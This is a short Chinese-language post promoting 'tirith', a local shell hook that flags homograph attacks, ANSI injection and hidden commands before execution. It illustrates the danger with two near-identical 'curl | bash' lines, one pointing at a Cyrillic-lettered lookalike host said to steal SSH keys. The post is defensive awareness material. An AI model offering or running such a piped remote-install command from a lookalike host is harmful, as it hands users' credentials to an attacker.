說實話，你上次在粘貼到終端之前仔細閱讀命令是什麼時候？ 因為這兩行看起來一模一樣： curl -sSL install.example-cli | bash curl -sSL https://іnstall.example-clі | bash 一條命令安裝你的工具，另一條命令竊取你的 SSH 密鑰。 那個і？是西裡爾字母，不是拉丁字母。你的瀏覽器會屏蔽它，但你的終端卻毫無反應。 隨意的編程方式讓情況變得更糟。每個人都像沒事人一樣，從 ChatGPT 和其他隨機倉庫粘貼命令。我們每個人都可能因為一條錯誤的 curl | bash 命令而失去一切。 所以我開發了修復方案：“tirith”。一個隱形的 shell 鉤子。它可以在同形異義詞攻擊、ANSI 注入、隱藏命令和 dotfile 覆蓋執行之前將其捕獲。30 條規則。僅限本地使用。不收集遙測數據。